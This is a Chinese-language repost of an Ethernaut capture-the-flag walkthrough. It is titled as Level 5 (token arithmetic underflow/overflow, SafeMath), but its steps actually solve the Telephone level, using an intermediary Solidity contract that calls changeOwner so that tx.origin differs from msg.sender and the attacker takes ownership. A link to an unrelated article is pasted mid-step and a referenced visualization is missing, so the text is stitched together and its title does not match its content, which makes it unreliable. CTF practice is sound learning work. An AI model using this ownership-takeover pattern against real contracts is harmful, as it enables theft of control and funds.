Ethernaut Level 5代币演练：如何防止滥用算术下溢和溢出

以下是上面代码段的可视化：

这会使得处理算术运算符的合约易受攻击。通常我们从safemath.sol库继承数学运算符。

细节演练

1. 注意Telephone.sol的changeOwner函数检查是否（tx.origin！= msg.sender）。似乎我们可以通过方案3成功触发此功能：区块链研究实验室| 如何防止滥用智能合约中的伪随机性
2. 创建一个电话合约，Telephony构成合同A.在Telephony中实例化合约B，您的Telephone.sol：

contract Telephony {
Telephone public phone = Telephone(YOUR_INSTANCE_ADDR_HERE);
//TODO...
}

3、在Telephony中创建一个changeOwner函数，该函数调用Telephone中的changeOwner函数，即玩电话游戏。

function changeOwner(address _owner) public {
phone.changeOwner(_owner);
}

4、注意await contract.owner（）在控制台中现在指示您的用户钱包是所有者！

注意要点

· 使用SafeMath.sol处理简单的数学运算

—-

编译者/作者：不详

玩币族申明：玩币族作为开放的资讯翻译/分享平台，所提供的所有资讯仅代表作者个人观点，与玩币族平台立场无关，且不构成任何投资理财建议。文章版权归原作者所有。